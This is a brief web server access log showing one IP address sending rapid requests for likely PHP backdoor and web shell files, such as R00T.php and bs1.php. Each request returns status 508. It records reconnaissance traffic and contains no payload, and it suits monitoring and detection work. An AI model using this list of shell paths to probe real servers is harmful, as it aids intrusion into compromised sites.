20.46.121.148 - - [06/Jul/2026:16:50:07 +0000] "GET /wp-includes//wp-includes/ms-files.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:08 +0000] "GET /bs1.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:08 +0000] "GET /wp-includes//class-wp-query-ajax.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:08 +0000] "GET //wp-includes/l10n/min.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:08 +0000] "GET /ova.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:09 +0000] "GET /d61.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:09 +0000] "GET //file6.php HTTP/1.1" 508 288 "-" "-"
20.46.121.148 - - [06/Jul/2026:16:50:09 +0000] "GET /R00T.php HTTP/1.1" 508 288 "-" "-"
